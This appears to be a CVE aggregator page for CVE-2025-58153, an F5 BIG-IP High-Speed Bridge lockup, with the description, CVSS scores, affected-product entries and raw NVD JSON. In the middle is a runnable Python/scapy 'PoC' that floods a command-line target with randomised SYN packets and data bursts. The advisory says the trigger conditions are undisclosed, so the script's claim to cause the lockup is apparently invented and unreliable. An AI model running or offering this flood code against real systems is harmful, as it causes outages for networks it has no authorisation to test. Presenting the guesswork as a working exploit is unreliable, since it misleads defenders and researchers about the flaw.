CVE-2025-58153

Description

Under undisclosed traffic conditions along with conditions beyond the attacker's control, hardware systems with a High-Speed Bridge (HSB) may experience a lockup of the HSB. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_access_policy_manager:17.5.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_firewall_manager:17.5.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:17.5.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_analytics:17.5.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:f5:big-ip_application_acceleration_manager:17.5.0:*:*:*:*:*:*:* - VULNERABLE

F5 BIG-IP 硬件平台（具体版本请参考F5官方公告K000151658）

所有配备高速桥接器（HSB）的F5硬件系统

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-58153 PoC - F5 HSB Lockup Trigger
# Note: This vulnerability requires specific traffic patterns combined with
# conditions beyond the attacker's control. The following is a conceptual
# demonstration of traffic that may trigger HSB lockup conditions.

#!/usr/bin/env python3
import socket
import struct
import time
import random
from scapy.all import *

def craft_hsb_trigger_traffic(target_ip, target_port=443, duration=60):
    """
    Generate traffic patterns designed to stress the High-Speed Bridge (HSB)
    on F5 hardware systems. This targets specific packet processing paths
    that may lead to HSB lockup under certain conditions.
    """
    print(f"[*] Starting HSB lockup trigger against {target_ip}:{target_port}")
    print(f"[*] Duration: {duration} seconds")
    print("[!] WARNING: This may cause hardware lockup requiring manual intervention")

    end_time = time.time() + duration
    packet_count = 0

    while time.time() < end_time:
        try:
            # Generate varied packet sizes to stress HSB buffers
            payload_size = random.choice([64, 128, 256, 512, 1024, 1460, 9000])

            # Craft packets with varying IP/TCP options to trigger different
            # HSB processing paths
            for i in range(100):
                src_port = random.randint(1024, 65535)
                seq_num = random.randint(0, 4294967295)

                # TCP SYN flood-like pattern with varied window sizes
                pkt = IP(dst=target_ip) / TCP(
                    sport=src_port,
                    dport=target_port,
                    flags="S",
                    seq=seq_num,
                    window=random.choice([0, 1, 65535, 8192])
                ) / Raw(RandomString(payload_size))

                send(pkt, verbose=False)
                packet_count += 1

            # Burst pattern to trigger HSB pipeline conditions
            burst = [IP(dst=target_ip)/TCP(dport=target_port, flags="PA")
                     / Raw(RandomString(random.randint(40, 1500)))
                     for _ in range(500)]
            send(burst, verbose=False)
            packet_count += 500

            time.sleep(0.01)

        except Exception as e:
            print(f"[!] Error: {e}")
            continue

    print(f"[*] Sent {packet_count} packets")
    print("[!] Check target HSB status for potential lockup")

if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print("Usage: python3 cve_2025_58153.py <target_ip> [duration]")
        sys.exit(1)

    target = sys.argv[1]
    dur = int(sys.argv[2]) if len(sys.argv) > 2 else 60
    craft_hsb_trigger_traffic(target, duration=dur)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58153
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58153
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58153/
[4] VulDB https://vuldb.com/cve/CVE-2025-58153
[5] https://my.f5.com/manage/s/article/K000151658

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58153", "sourceIdentifier": "[email protected]", "published": "2025-10-15T14:15:52.687", "lastModified": "2026-02-04T17:47:36.790", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Under undisclosed traffic conditions along with conditions beyond the attacker's control, hardware systems with a High-Speed Bridge (HSB) may experience a lockup of the HSB.\n\n Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-667"}]}, {"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-667"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "A7A0C1CA-EDEF-463F-B7C8-8B9E67239FC1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "6538FBFE-AE3F-41DC-BE48-8A2444DE1F39"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_advanced_web_application_firewall:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "8CDAF78A-6C2B-4640-93DD-524A0D9D80CE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_analytics:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "4BEC05AA-EB63-4A34-94E8-81606329BA75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_acceleration_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "F3007970-0661-4CAC-91A6-363396ED3B41"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_security_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "2450DC77-B46C-4886-AC9A-CF78B1EC4F06"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_application_visibility_and_reporting:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.1.0", "versionEndExcluding": "15.1.10.8", "matchCriteriaId": "D8BC9B56-DC91-4312-9A37-0892E1DCC97D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:f5:big-ip_automation_toolchain:*:*:*:*:*:*:* ... (truncated)